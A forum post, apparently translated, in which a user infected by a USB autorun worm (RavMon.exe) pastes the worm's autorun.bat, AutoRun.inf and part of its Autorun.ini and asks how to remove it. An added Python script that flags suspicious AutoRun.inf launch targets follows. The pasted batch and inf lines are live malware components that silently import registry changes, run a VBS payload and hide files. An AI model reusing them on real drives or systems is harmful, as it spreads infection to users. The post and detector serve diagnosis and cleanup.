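Experienced people, please! Let's have a technical discussion!
I got infected with this virus by connecting a portable hard drive. The first symptom I noticed was that hidden files could not be displayed, because the virus had deleted the relevant entry in the registry. After I rebuilt the registry entry, I found:
Every drive has files like these: autorun.bat, autorun.bin, Autorun.exe, Autorun.ico, AutoRun.inf, Autorun.ini, autorun.reg, autorun.txt, autorun.vbs, autorun.wsh, RavMon.exe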
---------------------
The contents of autorun.bat are:
@echo off
rem autorun storm
if exist .\autorun.reg regedit /s .\autorun.reg
if not "%1"=="" goto open
if exist autorun.vbs start WScript.exe autorun.vbs&exit
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
exit
:open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if not "%1"=="Over" goto :next2
if exist .\autorun.bin type .\autorun.bin >C:\autorun.txt&&exit
if exist %SYSTEMROOT%\system32\autorun.bin type %SYSTEMROOT%\system32\autorun.bin >c:\autorun.txt&&exit
exit
:next2
if "%1"=="-" attrib -s -a -h -r %2\autorun.*
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
:end
---------
The contents of AutoRun.inf are:
[AutoRun]
open=RavMon.exe
shell\open=打开(&O)
shell\open\Command=RavMon.exe
shell\explore=资源管理器(&X)
shell\explore\Command="RavMon.exe -e"
-------------------
Autorun.ini has quite a lot in it, so I'll pick one section:
[AUTORUN]
CAPTION = "Driver Installation tool Ver 1.0"
LOADICON = "AUTORUN.ICO"
BACKGROUND = "BMP\menu1.BMP"
BACKGROUND16 = "BMP\menu16.BMP"
DEBUGMODE = 0
STRING1 = 01
STRING2 = 3
STRING3 = 32
STRING4 = 5
STRING5 = 4
STRING6 = 9
STRING7 = 13
STRING8 = 15
STRING9 = 1
STRING10 = 4
STRING11 = 9
STRING12 = 13
STRING13 = 15
STRING14 = 12
STRING15 = 12
How do I detect and remove it, please!
Reference answer: Automatically find and delete AutoRun virus-related files 1.2
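As an added example (not part of the original post and not the tool named in the answer), the Python code below parses an AutoRun.inf like the one quoted above and reports which launch targets are executables or scripts sitting in the drive root, so they can be reviewed before cleanup. The function names are hypothetical and the sample data is constructed from the post's own listing.

```python
import re

# Keys in an [AutoRun] section that make Windows launch a program.
LAUNCH_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$", re.I)
EXEC_EXT = (".exe", ".bat", ".cmd", ".com", ".scr", ".pif", ".vbs", ".wsh")

def launch_entries(inf_text):
    """Return [(key, program)] for every launching key in the [AutoRun] section."""
    entries, in_section = [], False
    for raw in inf_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
            continue
        if not in_section or line.startswith(";") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        # Drop quotes, then keep the first token (the program, without arguments).
        tokens = value.replace('"', "").split()
        if LAUNCH_KEY.match(key) and tokens:
            entries.append((key, tokens[0]))
    return entries

def suspicious_targets(inf_text, root_files):
    """Launch targets that are executables or scripts present in the drive root."""
    present = {name.lower() for name in root_files}
    hits = []
    for _key, target in launch_entries(inf_text):
        name = target.lower().lstrip(".\\")
        if name.endswith(EXEC_EXT) and name in present and target not in hits:
            hits.append(target)
    return hits

# Constructed sample: the AutoRun.inf and root file list quoted in the post.
SAMPLE_INF = r"""[AutoRun]
open=RavMon.exe
shell\open=打开(&O)
shell\open\Command=RavMon.exe
shell\explore=资源管理器(&X)
shell\explore\Command="RavMon.exe -e"
"""
SAMPLE_ROOT = ["autorun.bat", "autorun.bin", "Autorun.exe", "Autorun.ico",
               "AutoRun.inf", "Autorun.ini", "autorun.reg", "autorun.txt",
               "autorun.vbs", "autorun.wsh", "RavMon.exe"]

if __name__ == "__main__":
    print("flag for review:", suspicious_targets(SAMPLE_INF, SAMPLE_ROOT))
```

The display-name keys (`shell\open`, `shell\explore`) are ignored on purpose: only the `open` and `...\Command` keys launch a program.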